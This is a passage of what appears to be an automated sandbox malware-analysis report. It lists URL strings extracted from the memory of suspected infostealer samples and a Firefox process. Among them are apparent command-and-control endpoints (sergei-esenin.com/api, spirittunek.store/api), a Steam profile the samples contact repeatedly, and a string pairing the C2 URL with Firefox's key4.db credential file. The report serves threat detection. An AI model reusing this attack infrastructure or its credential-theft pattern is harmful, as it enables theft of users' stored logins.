Source: 8138ba21a1.exe, 00000012.00000003.1998252490.0000000001187000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api((
Source: 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2181693561.00000000011A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api1
Source: file.exe, 00000000.00000003.1445624712.0000000005985000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api5UP3P
Source: file.exe, 00000000.00000003.1487793177.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458847673.0000000005990000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1459122490.0000000005990000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1474136490.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487656293.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1477815226.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1460412273.0000000005991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api8P
Source: file.exe, 00000000.00000003.1474136490.000000000598F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiD3l
Source: 8138ba21a1.exe, 00000012.00000003.2043446372.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2047304849.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2066736978.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2042228537.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiKAa
Source: file.exe, 00000000.00000003.1487793177.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487656293.000000000598F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiP3P
Source: 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2181693561.00000000011A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiZ
Source: file.exe, 00000000.00000003.1487793177.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458847673.0000000005990000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1459122490.0000000005990000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1474136490.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487775149.000000000120A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487656293.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1477815226.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1504653859.000000000120A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1498095593.000000000120B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1460412273.0000000005991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apie
Source: 8138ba21a1.exe, 00000012.00000003.2180479528.0000000001192000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apif
Source: file.exe, 00000000.00000003.1474200360.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apim
Source: file.exe, 00000000.00000003.1474200360.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apimo
Source: file.exe, 00000000.00000003.1487775149.000000000120A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apipV
Source: 8138ba21a1.exe, 00000012.00000003.2096131872.00000000011A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apis
Source: file.exe, 00000000.00000003.1417736971.00000000011AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apit
Source: 8138ba21a1.exe, 00000012.00000003.2180479528.0000000001192000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2117059192.0000000001191000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiw
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/e
Source: 8138ba21a1.exe, 00000012.00000003.2181105344.0000000001119000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/p
Source: 8138ba21a1.exe, 00000012.00000003.2021461230.00000000059AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/w
Source: file.exe, 00000000.00000003.1445425292.0000000005994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/api
Source: 8138ba21a1.exe, 00000012.00000003.2181105344.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apial
Source: 8138ba21a1.exe, 00000012.00000003.2181105344.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apir3.default-release/key4.dbPK
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apiu
Source: firefox.exe, 0000001D.00000002.2168505988.000001C9678CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 0000001D.00000002.2157086315.000001C967403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001D.00000002.2157086315.000001C967403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spirittunek.store:443/api
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2041476436.000001C96F758000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967445000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001D.00000002.2175868045.000001C9683E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2129414948.000001C963357000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2044345773.000001C969540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2300171636.000001C96F5F6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2041476436.000001C96F758000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2175868045.000001C96831E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967445000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2249675969.000001C96953A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2155269647.000001C967103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2310925330.000001C971677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C9679BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E09000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2229257788.000001C968F51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001119000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/J
Source: 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/c
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/p
Source: 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001119000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.1418033893.0000000001170000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba2
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 0000001D.00000002.2126645860.000001C962BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C9674AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001D.00000002.2252344441.000001C9696CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168505988.000001C9678EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C9674AF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C9688BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2300171636.000001C96F585000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: 8138ba21a1.exe, 00000012.00000003.2049402279.0000000005AC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001D.00000002.2168505988.000001C96780A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F7E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2170759523.000001C967C10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2170759523.000001C967C10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
